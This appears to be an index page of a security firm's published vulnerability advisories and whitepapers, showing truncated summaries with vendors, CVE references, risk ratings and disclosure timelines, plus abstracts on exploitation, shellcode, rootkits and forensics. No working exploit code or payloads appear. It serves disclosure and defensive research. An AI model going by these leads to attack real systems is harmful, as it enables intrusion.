Summary Name: McAfee Email and Web Security Appliance v5.6 – Password hashes can berecovered from a system backup and easily crackedRelease Date: 30 November 2012Reference: NGS00157Discoverer: Ben Williams Vendor: McAfeeVendor Reference:Systems Affected:Risk: MediumStatus: Published TimeLine Discovered: 25 November 2011Released: 29 November 2011Approved: 29 November 2011Reported:  4 December 2011Fixed: 13 March 2012Published:…

Summary Name: McAfee Email and Web Security Appliance v5.6 – Arbitrary filedownload is possible with a crafted URL, when logged in as any userRelease Date: 30 November 2012Reference: NGS00158Discoverer: Ben Williams Vendor: McAfeeVendor Reference:Systems Affected:Risk: MediumStatus: Published TimeLine Discovered: 26 November 2011Released: 29 November 2011Approved: 29 November 2011Reported:  4 December 2011Fixed:…

Summary Name: McAfee Email and Web Security Appliance v5.6 – Any logged-in user canbypass controls to reset passwords of other administratorsRelease Date: 30 November 2012Reference: NGS00155Discoverer: Ben WilliamsVendor: McAfeeVendor Reference:Systems Affected:Risk: HighStatus: Published TimeLine Discovered:  7 November 2011Released: 29 November 2011Approved: 29 November 2011Reported:  4 December 2011Fixed: 13 March 2012Published:…

Summary Name: McAfee Email and Web Security Appliance v5.6 – Active session tokensof other users are disclosed within the UIRelease Date: 30 November 2012Reference: NGS00156Discoverer: Ben Williams Vendor: McAfeeVendor Reference:Systems Affected:Risk: MediumStatus: Published TimeLine Discovered:  8 November 2011Released: 29 November 2011Approved: 29 November 2011Reported:  4 December 2011Fixed: 13 March 2012Published: 30…

Title: iOS 7 arbitrary code execution in kernel modeRelease Date: 14 March 2014Reference: NGS00596Discoverer: Andy DavisVendor: AppleVendor Reference: 600217059Systems Affected: iPhone 4 and later, iPod touch (5th generation) and later, iPad 2 and laterCVE Reference: CVE-2014-1287Risk: HighStatus: Fixed Download our technical advisory

Until November 2013 (CVE-2013-3906), exploit primitives for Object Linking and Embedding (OLE) objects were not discussed publicly. This changed at BlackHat USA 2015, when Haifei Bing presented “Attacking Interoperability: An OLE Edition”. This talk examined the internals of OLE embedding. Over the past few months, several malware campaigns targeting high-profile…

By using just a few commonly available tools and a bit of time, it is possible to port the Misfortune Cookie exploit to exploit a TD-8817 V8 router running the latest firmware and gain reliable control over its web interface without crashing the router, even after repeated exploitation attempts. In…

Research Insights Volume 6: Common Issues with Environment Breakouts Due to the rising trend in organisations implementing bring your own device (BYOD) and remote access working, IT departments are facing the ongoing risks of securing devices they neither own or control. This has led to a rise in the number…

A guideline for penetration testers to assess ecommerce and financial services applications. This document summarises NCC Group’s experience of assessing ecommerce and financial services applications, providing a checklist of common security issues seen in financial services web applications. In NCC Group’s experience, one of the best ways to identify the…

The proliferation of the personal and business use of mobile devices has created a strong demand for mobile security assurance. Mobile apps and devices can suffer from many of the same vulnerabilities as traditional systems but also require new approaches to security testing and risk assessment. This white paper looks to highlight some of…

tl;dr In June 2015, Microsoft released the MS15-61 advisory, to address a number of vulnerabilities. Today we’ve released a detailed analysis of one of these vulnerabilities, in the win32k.sys driver, and documented the necessary details for exploiting this class of vulnerability on Microsoft Windows 7 Service Pack 1. This is…

The @NCCGroupInfosec team performs security assessments across many different sectors and technologies. Regardless of the system being assessed, one of the most common issues we identify pertains to the use of weak passwords – permitted by an inadequate password policy. Systems that do not enforce a strong password policy can…

This whitepaper, produced by our Cyber Defence Operations team, is about the understanding of ransomware. It examines the impact, evolution and defensive strategies that can be employed by organisations. It is primarily focused on Microsoft Windows due to the historic prevalence and devastating impact on ransomware on this platform, but…

Summary – 24.08.2011 Name: Lumension Device Control (formerly Sanctuary) remote memory corruptionRelease Date: 24 August 2011Reference: NGS00054Discoverer: Andy Davis <andy.davis@ngssecure.com>Vendor: LumensionVendor Reference:Systems Affected: Lumension Device Control v4.4 SR6Risk: HighStatus: Published TimeLine Discovered:  3 March 2011Released:  3 March 2011Approved:  3 March 2011Reported:  3 March 2011Fixed:     24 May 2011Published:  24 August 2011 Description…

Summary – 31.07.2011 Name: LibAVCodec AMV Out of Array WriteRelease Date:  31 July 2011Reference: NGS00068Discoverer: Dominic ChellVendor: VideoLANVendor Reference: CVE-2011-1931Systems Affected: VLC media player 1.1.9 and earlier releasesRisk: HighStatus: Published TimeLine Discovered: 31 March 2011Released: 31 March 2011Approved: 31 March 2011Reported: 21 April 2011Fixed: 21 April 2011Published: 31 July 2011 Description…

Summary Name: Increased exploitation of Oracle GlassFish Server Administration Console Remote Authentication Bypass VulnerabilityRelease Date:  5 January 2012Reference: NGS00106Discoverer: David Spencer Vendor: OracleVendor Reference:Systems Affected: Oracle GlassFish Server 2.1 and 3Risk: HighStatus: Published TimeLine Discovered: 26 August 2011Released: 26 August 2011Approved: 26 August 2011Reported: 26 August 2011Fixed: July 2011Published:  5 January…

Vulnerability Summary Title:             Flash security restrictions bypass: File upload by URLRequest Release Date:   13 March 2015 Reference:         NCC00765 Discoverer:        Soroush Dalili Vendor:            Adobe Vendor Reference:  PSIRT-3146 Systems Affected:  Adobe Flash Player <=16.0.0.305, <=13.0.0.269, 11.2.202.442 CVE Reference:     CVE-2015-0340…

Summary – 22.03.2011 Name: Immunity Debugger Buffer OverflowRelease Date: 22 March 2011Reference: NGS00016Discoverer: Paul HarringtonVendor: Immunity IncVendor Reference: Support #3171Systems Affected: WindowsRisk: LowStatus: Fixed TimeLine Discovered: 28 October 2010Released: 28 October 2010Approved: 28 October 2010Reported: 28 October 2010Fixed:  6 December 2010Published: 22 March 2011 Description Immunity Debugger V1.73 contains a  buffer…

Summary Name: DataArmor Full Disk Encryption 3.0.12c – Restricted Environment breakout, Privilege Escalation and Full Disk DecryptionRelease Date: 30 November 2012Reference: NGS00193Discoverer: Stuart Passe Vendor: Mobile ArmorVendor Reference: KB #1060043Systems Affected: All versions of DataArmor and DriveArmor prior to v3.0.12.861Risk: CriticalStatus: Published TimeLine Discovered: 10 January 2012Released: 17 January 2012Approved: 17…

VULNERABILITY SUMMARY Title: cups-filters remote code executionRelease Date: 6 March 2015Reference: NCC00816Discoverer: Paul CollettVendor: Linux FoundationSystems Affected: All LinuxCVE Reference: CVE-2014-2707Risk: HighStatus: Published Download our technical advisory

=======Summary=======Name: SAP Message Server Heap OverflowRelease Date: 5 July 2007Reference: NGS00485Discover: Mark Litchfield lt;mark@ngssoftware.comVendor: SAPVendor Reference: SECRES-292Systems Affected: All VersionsRisk: CriticalStatus: Fixed ========TimeLine========Discovered: 4 January 2007Released: 19 January 2007Approved: 29 January 2007Reported: 11 January 2007Fixed: 2 May 2007Published: ===========Description===========The Message Server is a service used by the different applications serversto…

=======Summary=======Name: SAP DB Web Server Stack OverflowRelease Date: 5 July 2007Reference: NGS00486Discover: Mark Litchfield lt;mark@ngssoftware.comVendor: SAPVendor Reference: SECRES-291Systems Affected: All VersionsRisk: CriticalStatus: Fixed ========TimeLine========Discovered: 3 January 2007Released: 19 January 2007Approved: 29 January 2007Reported: 11 January 2007Fixed: 27 March 2007Published: ===========Description===========SAP DB is an open source database server sponsored by SAP…

=======Summary=======Name: Ingres remote unauthenticated pointer overwrite 2Release Date: 25 June 2007Reference: NGS00392Discover: Chris Anley chris@ngssoftware.comVendor: IngresVendor Reference: [Ingres bug 115927, CVE-2007-3336, CAID 35450]Systems Affected: Ingres 2006 9.0.4 and priorRisk: CriticalStatus: Published ========TimeLine========Discovered: 29 March 2006Released: 29 March 2006Approved: 29 March 2006Reported: 29 March 2006Fixed: 21 June 2007Published: 25 June 2007…

=======Summary=======Name: Ingres remote unauthenticated pointer overwrite 1Release Date: 25 June 2007Reference: NGS00391Discover: Chris Anley chris@ngssoftware.comVendor: IngresVendor Reference: Ingres bug 115927, CVE-2007-3336, CAID 35450Systems Affected: Ingres 2006 9.0.4 and priorRisk: CriticalStatus: Published ========TimeLine========Discovered: 29 March 2006Released: 29 March 2006Approved: 29 March 2006Reported: 29 March 2006Fixed: 21 June 2007Published: 25 June 2007…

Summary – 28.06.2011 Name: Cisco VPN Client Privilege EscalationReference: NGS00051Discoverer: Gavin Jones Vendor: CiscoVendor Reference:Systems Affected: Cisco VPN client (Windows 64 Bit)Risk: HighStatus: Fixed TimeLine Discovered: 15 February 2011Released: 15 February 2011Approved: 15 February 2011Reported: 22 February 2011Fixed: 24 March 2011Published: 28 June 2011 Description The 64 Bit Cisco VPN Client…

Summary – 22.03.2011 Name: Cisco IPSec VPN Implementation Group Name EnumerationReference: NGS00014Discoverer: Gavin JonesVendor: CiscoVendor Reference: CSCei51783, CSCtj96108 Systems Affected: ASA 5500 Series Adaptive Security Appliances -Cisco PIX 500 Series Security Appliances -Cisco VPN 3000 Series Concentrators (models 3005, 3015, 3020, 3030, 3060, and 3080)Risk: LowStatus: Published TimeLine Discovered: 20…

Summary – 05.07.2011 Name: Blue Coat BCAAA Remote Code Execution Vulnerability Release Date:  5 July 2011Reference: NGS00060Discoverer: Paul HarringtonVendor: Blue Coat Systems IncVendor Reference: 2-358686722Systems Affected: All versions of BCAAA associated with ProxySG releases 4.2.3, 4.3, 5.2, 5.3, 5.4, 5.5, and 6.1 available prior to April 21, 2011 or with a build…

Vulnerability Summary Title: BlackBerry Link Installs A WebDAV Server Which Does not Require Authentication to Access Release Date: 12 November 2013 Reference: NCC00622 Discoverer: Ollie Whitehouse Vendor: BlackBerry (formerly Research In Motion) Vendor Refefence: BSRT-2013-012 Systems Affected: Microsoft Windows, Mac OS X CVE Reference: CVE-2013-3694 CVSS: 6.8 Risk: High Status: Published

Summary Name: Bit51 Better WP Security Plugin – Unauthenticated Stored XSS to RCERelease Date: 30 July 2013Reference: NGS00500Discoverer: Richard Warren <richard.warren@nccgroup.com>Vendor: Bit51Vendor Reference:Systems Affected: Bit51 Better WP Security Plugin Version 3.4.8/3.4.9/3.4.10/3.5.2/3.5.3Risk: HighStatus: Published TimeLine Discovered: 1 April 2013Released: 1 April 2013Approved: 1 April 2013Reported: 1 April 2013Fixed: 21 July 2013Published:…

NGSSoftware Insight Security Research Advisory Name: Back Office Web Administration Authentication Bypass Systems Affected: Microsoft’s Back Office Web Administrator 4.0, 4.5 Severity: Medium/High Vendor URL: http://www.microsoft.com Author: David Litchfield (david@ngssoftware.com) Date: 17th April 2002 Advisory number: #NISR17042002A Advisory URL: http://www.ngssoftware.com/advisories/boa.txt Issue: Attackers can bypass the logon page and access the…

Mark Litchfield and John Heasman of NGSSoftware have discovered two highrisk vulnerabilities in the AtHoc Toolbar. The AtHoc toolbar is a plugin forMicrosoft’s Internet Explorer. The toolbar is redistributed to users of eBayAccentureThomasRegisterThomasRegionalJuniper NetworksWiredNewsCarFaxAgile PLM The flaws, that include a remotely exploitable buffer overflow and a formatstring bug, have been…

NGSSoftware Insight Security Research Advisory   Name: Sybase ASE convert overflow Systems Affected: Sybase Adaptive Server Enterprise 12.5.1 and lower Severity: High Vendor URL: http://www.sybase.com Author: Sherief Hammad [ sherief@ngssoftware.com ] Date of Technical Advisory: 25th June 2004   Details   There is an exploitable stack overflow in the Sybase…

Look at our old advisories! Adobe Acrobat Reader XML Forms Data Format Buffer Overflow ASE 1251 Datatype Overflow Athoc Toolbar Back Office Web Administration Authentication Bypass Critical Vulnerability In Snmpc Critical Risk Vulnerability In Ingres Pointer Overwrite 1 Critical Risk Vulnerability In Ingres Pointer Overwrite 2 Critical Risk Vulnerability In…

~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.Vulnerability Summary~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.Title Apple QuickTime Player m4a Processing Buffer OverflowRelease Date 23 October 2014Reference NGS00677Discoverer Karl SmithVendor AppleVendor Reference 16247108Systems Affected Windows 7, XPCVE Reference CVE-2014-4351Risk HighStatus Fixed~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.Resolution Timeline~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.Discovered 3 March 2014Reported 6 March 2014Released 6 March 2014Fixed 16 October 2014Published 23 October 2014~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.Vulnerability Description~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.QuickTime player on OS X and Windows…

Summary – 10.10.2011 Name: Apple OSX / iPhone iOS ImageIO TIFF getBandProcTIFF TileWidth Heap OverflowReference: NGS00062Discoverer: Dominic Chell Vendor: AppleVendor Reference: 145575681Systems Affected: Apple OSX / iPhone iOS / Possibly others using LibTiffRisk: HighStatus: Fixed TimeLine Discovered: 27 February 2011Released: 27 February 2011Approved: 29 March 2011Reported: 29 March 2011Fixed: 23 June 2011Published:…

Summary – 28.06.2011 Name: Apple Mac OS X ImageIO TIFF Integer OverflowReference: NGS00057Discoverer: Dominic Chell <dominic.chell@ngssecure.com>Vendor: AppleVendor Reference: 142522746Systems Affected: Mac OS X v10.6 through v10.6.6, Mac OS X Server v10.6 through v10.6.6. This issue does not affect systems prior to Mac OS X v10.6Risk: HighStatus: Published TimeLine Discovered: 8…

Title: Apple CoreAnimation Heap OverflowRelease:  Date 3 March 2014Reference:  NGS00550Discoverer:  Karl SmithVendor:  AppleVendor Reference:  15229587Systems Affected:  OS X Mountain Lion v10.8.5, OS X Mavericks 10.9 and 10.9.1CVE Reference:  CVE-2014-1258Risk:  HighStatus:  Fixed Download our technical advisory

When exploiting vulnerabilities in compiled software we are often constrained by the amount of data that can be used, therefore it is important that shellcode is as small as possible. In this paper the author will describe his attempt to write Win32 shellcode that is as small as possible, in…

This paper will address some of the common classes of coding error that can be encountered when auditing web applications running on the Active Server Pages (ASP) platform. Firstly the paper will provide a list of common coding problems to be discussed, followed by a discussion of the three main…

This paper, by David Litchfield, will discuss String Vulnerabilities on the Windows 2000 Operating System.  Download Whitepaper

This paper summarises the findings of NCC Group’s research into Akamai and provides companies who wish to gain maximum security through their solutions advice on how to achieve this. Akamai allows organisations to improve performance and decrease the load on a web-based service through distributed networks of servers to perform…

Title: Adobe flash sandbox bypass to navigate to local drivesRelease: Date 12 August 2014Reference: NGS00711Discoverer: Soroush DaliliVendor: AdobeVendor Reference: PSIRT-2823Systems Affected: Flash Player 14.0.0.125 (tested with IE 11)CVE Reference: CVE-2014-0541Risk: MediumStatus: Fixed Download our technical advisory

Vulnerability Summary Title:                      Adobe Flash Player Cross Domain Policy Bypass Release Date:        13 March 2015 Reference:            NCC00761 Discoverer:            Soroush Dalili Vendor:             …

NGSSoftware Insight Security Research Advisory Name: Adobe Acrobat Reader XML Forms Data Format Buffer OverflowSystems Affected: Adobe Acrobat Reader version 5.1Severity: High RiskVendor URL: http://www.adobe.com/Author: David Litchfield [ david@ngssoftware.com ]Date Vendor Notified: 7th February 2004Date of Public Advisory: 3rd March 2004Advisory number: #NISR03022004Advisory URL: http://www.ngssoftware.com/advisories/adobexfdf.txt Description***********Adobe Acrobat Reader is a…

Modelling Threat Actor Phishing Behaviour – “you’re only as strong as your weakest link!” This whitepaper focuses on the reconnaisance phase of a simulated attack. It will discuss how likely targets are identified within an organisation and why certain individuals are chosen. The reconnaisance phase will typically involve open source intelligence…

Research Insights Volume 7: Exploitation Advancements In the next of the Research Insights series we have looked at the exploitation techniques used by cyber criminals in their attempt to gain access to your critical business information. As exploits become more sophisticated, attacks of the previous era are now no longer…

There has been some debate on the importance of antivirus software over the past few years. Some see antivirus as a way to satisfy risk controls and form part of an organisation’s information security strategy and insist on antivirus being installed on all an organisations machines. However this demand for antivirus has…

There are a huge number of automated attack tools available that can spider and mirror application content, extract confidential material, discover code injection flaws, fuzz application variables for exploitable overflows, scan for common files or vulnerable CGIs and generally attack or exploit web-based application flaws. These tools are very useful…

This white paper outlines a set of practical and pragmatic security considerations for organisations designing, developing and, testing Internet of things (IoT) devices and solutions. The purpose of this white paper is to provide practical advice for consideration as part of the product development lifecycle. While IoT products by their…

This paper will demonstrate how through the implementation of a well thought-out hosting name and URL referencing convention can provide a sizable contribution to an organisations defence-in-depth posture. Host and URL naming conventions are an issue that is often overlooked by organisations when they are developing web applications, but poorly…

Over the past few years Oracle has fixed a large number of PL/SQL injection vulnerabilities in their database server product. To help combat this class of attack Oracle has introduced the DBMS_ASSERT PL/SQL package. As a security researcher, it is excellent to see Oracle finally making the right positive moves…

A second-order code injection attack is the process where malicious code is injected into a web-based application and not immediately executed but is stored by the application to be retrieved, rendered and executed by the victim later. In this paper we will further explain second-order code injection attacks, providing examples…

Embedded systems have become a part of our day to day lives and examples of these can be seen everywhere from TVs to aircraft, printers to weapon control systems,  but as a security researcher it is often difficult to know how to begin when testing one of these black boxes.…

The fourth edition of our ‘Research Insights’ series delves into the risks faced in the Maritime Industry as a result of the increasingly connected world that we live in. Cyber security weaknesses in the maritime industry include insufficiently maintained and protected software, problems with legacy communication systems and the widespread…

This paper is the second in a series of Research Insights from our world class research team. It looks at some of the most recent trends in information security defence, such as, cloud computing, mobile apps, mobile devices and security information management systems. Download whitepaper The next in the series…

This whitepaper forms the first in a series of research insights from NCC Group. It delves into the financial services sector to provide an overview of some of the threats the sector is currently facing. This is a series of papers from NCC Group, the next two papers in the…

The first quantum cryptographic exchange occurred in October 1989 at IBM’s Thomas J. Watson Research Centre near New York. Two computers called Alice and Bob successfully negotiated a completely secure channel of communication over a distance of 32 centimetres, making quantum cryptography a reality rather than just a theory. In…

This whitepaper is about PCI DSS v3.0 Requirement 3.4 – the requirement to protect cardholder data on disk/at rest. There are a number of compliant options available, with varying levels of security in different scenarios. This document is intended as an analysis of the various compliant options such that the…

In an increasingly connected world, cyber security is more important than ever. NCC Group, one of the world’s leading cyber security research companies, regularly investigates the susceptibility of non-traditional systems to attack in order to help raise awareness of the risks to these systems. In this paper, we discuss the…

Most organisations are aware of and are protecting themselves against the threat posed by an attacker gaining access to systems through the exploitation of security vulnerabilities within the organisation’s systems. However the potential threat that information unintentionally leaked and freely available over the internet can pose to an organisation. This…

This paper will discuss the weakness of Oracle passwords and how they are implemented with reference to a number of current security issues. Lastly this paper will introduce a tool to exploit this weakness in Oracle’s most priviliged account. Download whitepaper

This paper is the final in a series of papers exploring Oracle forensics by David Litchfield. In this paper David will be examining the internals of the Oracle System Change Number (SCN) in 10g and show how it  can be useful in forensic investigations. The paper will also show how orablock and…

This paper is the 6th in a series of papers by David Litchfield exploring the topic of Oracle Forensics. This paper will look at the ways a forensics examiner can search for evidence of an attack in the places and technologies designed by Oracle for disaster recovery processes. Download whitepaper

This paper is the 5th in a series of papers by David Litchfield exploring the topic of Oracle Forensics, in this installment David will be discussing forensic analysis of a compromised database server. When investigating other areas of computer forensics it is often obvious that a crime has been committed however…

This papers is the 4th in a series of papers covering Oracle forensics, in this paper David Litchfield will cover reactions to a security incident occurring. For many organisations without a plan of action in the event of a security incident the instinctive response is to disconnect the system from the network…

This paper is the 3rd in a series of papers by David Litchfield exploring the topic of Oracle Forensics. In this installment David will be looking at ways to understand if a breach has been successful. The paper will start by exploring attacks against the authentication mechanism and evidence from the…

This second paper in the Oracle Forensics series will show, even when an object has been dropped and purged from the system there will be, in the vast majority of cases, fragments left “lying around” which can be sewn together to build an accurate picture of what the actions the…

This paper is the 1st in a series of papers by David Litchfield exploring the topic of Oracle Forensics. In this 1st paper David will explain how the redo logs can be a rich source of evidence for a forensic examiner when they are investigating a compromised Oracle database server. Whenever a…

As the number of products providing protection against buffer overflow exploits on the stack, non-stack based over flow exploit will become more and more common. In this paper we will start by explaining the differences between a stack-based overflow and a non-stack based overflow, then explain how to write a…

On the 17th of March 2003 Microsoft announced a patch to fix a security vulnerability at the centre of the Windows 2000 operating system. In this paper we will discuss a number of new attack vectors that we have discovered on the same operating system, including java based web servers…

This paper covers topics from the author’s previous paper “Advanced SQL Injection”, expanding upon and clarifying ideas from the previous paper. It will describe a method for privilege escalation using the openrowset function to scan a network, a method for extracting information in the absence of an error message and…

This paper will be exploring the security postures of Microsoft’s SQL Server and Oracles RDBMS and examining the differences between the two systems based upon flaws reported by external security researchers. Download whitepaper

It is widely know that an SQL Server uses an undocumented function, pwdencrypt() to produce a hash of the user’s password, which is stored in the sysxlogins table of the master database. However what has not been discussed are the details of the pwdencrypt() Function. This paper will cover the pwdencrypt function…

Due to their relatively low cost, small size and easy of distribution smart cards have become a popular choice for security when designing a system. They are often regarded as tamper proof devices where data can be physically protected, but this is not the case and it should be remembered…

Over the past few years NCC Group has identified over 50 USB driver bugs, using this research along with information from his 2011 paper “USB – Undermining Security Barriers” Andy Davis will, in this paper, outline common USB vulnerabilities and how to identify them. The paper will firstly discuss the…

Inter-Protocol exploration is an attack vector which encapsulates malicious data within a particular protocol in such a way that the resultant data stream is capable of exploiting a different application which uses a different protocol entirely. This paper will expand upon previous research into Inter-Protocol Exploitation and will show the…

Research into web browser security has acted as a catalyst for more depth research into Inter-Protocol Communication, an attack vector that potentially allows arbitrary protocols to meaningful interact with each other. In the past, it has been assumed that communication between different protocols is invalid and of no consequence, this paper will…

Over the past few years there has been a shift in the pattern of security vulnerabilities and increase in the volume of zero-day (0day) exploits which is making traditional security strategies less effective. Although traditional techniques such as penetration testing and vulnerability scanning are still an essential part of a company’s security…

This paper will build upon the author’s previous research presented in February 2006 that explored a way of persisting a rootkit in the system BIOS via the Advanced Configuration and Power Interface (ACPI). This paper will discuss means of persisting a rootkit on a PCI device containing a flashable expansion…

Penetration test reports commonly contain mention of vulnerabilities in SSL/TLS (hereafter referred to as just SSL). In many cases, this is due to system administrators not understanding the details of these services’ configuration and assuming that simply using SSL provides security. The issues identified during penetration tests are usually low…

Although Oracle 9 was proven not to be Unbreakable as their marketing campaign claimed, the product had passed fourteen independent security evaluations, demonstrating Oracles commitment to producing a secure product. In this paper we aim to bring Oracle customers to the secure environment they were promised by examining the ways…

MySQL is one of the most popular open source databases, and compared to some database management systems it is relatively easy to configure. However there are still a wide variety of configuration issues that need to be addressed to ensure the system is secure. This paper will provide an outline…

This paper will show Lotus Domino administrators ways in which an attacker would attempt to subvert the security of a Domino web server and provide insight into the mind of a Domino hacker. Throughout the paper the attacks will be explained in detail and will include information on how to…

The paper will review research in 2012 conducted into the overall security posture of popular appliance-based security products, building on research carried out in 2011 by NCC Group. The research focused on the most recent versions of widely used appliances from popular vendors in the IT Security industry covering: Firewalls…

This paper will discuss the format of device requests that are sent to USB devices in order to hopefully provide an insight into areas where software flaws may exist. It will also discuss a number of public vulnerabilities in USB devices and finally, the installation and usage of Frisbee Lite.…

Many people are unaware that video displays send data which is then processed by the connected device and that this data can contain security threats. This paper aims to act as a useful introduction to the technologies involved in video interfacing, the potential for security vulnerabilities and ways to test for their…

The security of security software is often taken for granted, and people assume that as it has been developed by a company that knows security it is likely to be secure. However with regards to Security Gateway UIs this is an incorrect assumption, the developers who design code and test the UI…

The modern vehicle has become increasingly computerised, and with that have come increased risk of cyber threats. While it has been known for some time in the vehicle modification and security industries that electronic vehicle systems contain exploitable vulnerabilities, it is only recently that academics, government, vehicle manufacturers, and the cyber security research community…

The why behind web application penetration test prerequisites Before a web application penetration test is scheduled to start, the company performing the test will contact the client with a set of prerequisites; that is, a list of considerations and configurations that are required before the test can begin. However, the…

Cyber red-teaming business-critical systems while managing operational risk Cyber red-teaming allows mature organisations to gauge their true resilience to sophisticated, planned, and somewhat sustained cyber-attack. These organisations use red team engagements to assess multiple facets of their cyber security strategy, maturity and implementation. With the introduction of programmes such as…

Historically USB bugs have required physical access so that a rogue device can be inserted into the target system to trigger a vulnerability by supplying malicious data, often within a USB protocol descriptor. This paper provides step-by-step instructions, showing how to remotely trigger a Windows-based USB bug by using a…

In this paper we will write from the perspective of an attacker targeting the Microsoft SQL Server. The paper will cover: Setting up for an attack Attacks that do not require authentication Attacks that require authentication

This patch notification details a high risk vulnerability in Mac OS X Image Raw, this vulnerability was discovered by Paul Harrington.  Download patch notification

The advent of thin client, diskless PCs appear to offer IT Managers a cheap and effective solution to the problem of managing a large estate of desktop PCs and the associated security risks, making thin clients an attractive solution. However research for this paper has revealed that these devices can…

Phishing started off being part of popular hacking culture, but quickly professional criminals began using phishing techniques to steal personal finances and conduct identity theft at a global level. As phishing attacks become more widespread and more sophisticated it is important that we understand the tools and techniques used. This…

This patch notification details a high risk vulnerability, discovered by David Middlehurst, in ImpressPages CMS v1.0.12.  Download patch notification

This patch notification details a high risk vulnerability, discovered by Andy Davis, in in Lumension Device Control. Download patch notification

This patch notification details a medium risk vulnerability that has been discovered by Ben Williams in the McAfee Email and Web Security Appliance.  Download patch notification

This patch notification details a high risk vulnerability discovered by Ben Williams in the McAfee Email and Web Security Appliance.  Download patch notification

Oracle Security Specialist, Alex Kornbrust, demonstrated that there are certain cases where the use of the DBMS_ASSERT.QUALIFIED_SQL_NAME function can be unintentionally misused by developers so that SQL injection is still possible and showing a way to break out of a quoted string to inject arbitrary SQL. This paper will explore another…

This patch notification details a medium risk vulnerability discovered by Ben Williams in the McAfee Email and Web Security Appliance.  Download patch notification

This patch notification details a medium risk vulnerability that has been discovered by Ben Williams in the McAfee Email and Web Security Appliance.  Download patch notification

This patch notification details a high risk vulnerability in the McAfee Email and Web Security Appliance, discovered by Ben Williams.  Download patch notification

This patch notification details a medium risk vulnerability in the McAfee Email and Web Security Appliance, discovered by Ben Williams.  Download patch notification

This patch notification details a medium risk vulnerability discovered by Gavin Jones in Symantec Enterprise Security Management 9.0.1 Agent (version 9.0.1153.20001) Download patch notification

This patch notification details a medium risk vulnerability discovered by Gavin Jones in Symantec Endpoint Protection Version 12.1.1000.157.105.  Download patch notification

This patch notification details a high risk vulnerability discovered by Daniel Compton in Nagios XI Network Monitor.  Download patch notification

This patch notification details a high risk vulnerability, discovered by NGS Secure, in (nomachine) NX Server for Linux 3.5.0-4 (Advanced and Enterprise across redhat and debian hosts). Download patch notification

This patch notification details a high risk vulnerability discovered by Andy Davis in Oracle database 11g. Download patch notification

This patch notification details a high risk vulnerability discovered by Andy Davis in Oracle database 11g. Download patch notification

This patch notification details a high risk vulnerability in Oracle Retail Integration Bus Manager, discovered by Andy Davis. Download patch notification

This patch notification covers a high risk vulnerability discovered by Andy Davis within Oracle Retail Central Office. Download patch notification

This patch notification details a high risk vulnerability discovered by Andy Davis in Apple OS X Lion v10.7 to v10.7.4, OS X Lion Server v10.7 to v10.7.4. Download patch notification

This patch notification details a high risk vulnerability, discovered by Daniel Compton, in PRTG Network Monitor.  Download patch notification

This patch notification details a high risk vulnerability in the Samba service, discovered by Andy Davis.  Download patch notification

This patch notification details a high risk vulnerability that has been discovered by Andy Davis in the Samba service running on the Blackberry Playbook.  Download patch notification

This patch notification details a high risk vulnerability discovered by Andy Davis in Oracle Solaris. Download patch notification

This patch notification details a high risk vulnerability in Symantec Message Filter, discovered by Ben Williams. Download patch notification

This patch notification details a low risk vulnerability in Symantec Message Filter, discovered by Ben Williams. Download patch notification

This patch notification details a high risk vulnerability discovered by Ben Williams in Symantec Messaging Gateway. Download patch notification

This patch notification details a medium risk vulnerability discovered by Ben Williams in Symantec Messaging Gateway. Download patch notification

This patch notification details a critical vulnerability discovered by Ben Williams in Symantec Messaging Gateway. Download patch notification

This patch notification details a critical vulnerability discovered by Ben Williams in Symantec Messaging Gateway. Download patch notification

This patch notification details a high risk vulnerability in Symantec Messaging Gateway, discovered by Ben Williams. Download patch notification

This patch notification details a critical vulnerability, discovered by Edward Torkington, in Symantec PCAnywhere.  Download patch notification

Distributed Denial of Service (DDoS) attacks first appeared on the internet in 2000, since then they have increased in frequency and size and become a serious threat to an organisation’s security. During a DDoS attack thousands of botnets will flood an organisation’s servers with more requests than they can handle,…

This paper will explore the issue of laptop docking stations being used as attack platforms as well as explaining a few simple techniques that can be used to mitigate the risks.  Laptop docking stations are attractive to organisations with semi-mobile workers as they enable users to connect their laptops to…

This paper is the second in a series discussing the security of the Blackberry PlayBook, and will focus on the security of the Blackberry Bridge. The Blackberry Bridge allows its users to connect their Playbook to the Blackberry phone and use applications on the tablet through the phone and for…

This paper forms the first in a series of papers on the security of the first tablet devices from Research in Motion (RIM), the Blackberry PlayBook. This paper aims to give an overview of the security of the Blackberry PlayBook, a breadth first approach was taken to uncover as many…

This whitepaper summarises research undertaken in 2013/14 to develop offensive reconnaissance techniques for automated and external enumeration of the email filtering solutions of target organisations. It show how methodology, automated scripts, and test message sets can be used to enumerate a target email filtering solution, quickly and to a high…

This paper is focused on Windows and the Intel Architecture, and will briefly outline the current supervisor boundaries provided. Different attack vectors, along with relevant examples, will be provided to demonstrate how to attack the supervisor from the perspective of the supervised. Download whitepaper

Summary Name: Oracle Gridengine sgepasswd Buffer OverflowRelease Date: 30 November 2012Reference: NGS00107Discoverer: Edward Torkington <edward.torkington@ngssecure.com>Vendor: OracleVendor Reference:Systems Affected: Multiple packages – version 6_2u7Risk: HighStatus: Published TimeLine Discovered:  1 August 2011Released:  1 August 2011Approved:  1 August 2011Reported:  3 August 2011Fixed: 17 April 2012Published: 30 November 2012 Description http://www.oracle.com/us/products/tools/oracle-grid-engine-075549.html “Oracle Grid Engine…

Summary Name: Nagios XI Network Monitor – OS Command InjectionRelease Date: 30 November 2012Reference: NGS00196Discoverer: Daniel Compton <daniel.compton@ngssecure.com>Vendor: NagiosVendor Reference: 0000283Systems Affected: Nagios XI Network Monitor 2011R1.9Risk: HighStatus: Published TimeLine Discovered: 30 January 2012Released: 31 January 2012Approved: 31 January 2012Reported: 31 January 2012Fixed: 23 May 2012Published: 30 November 2012 Description…

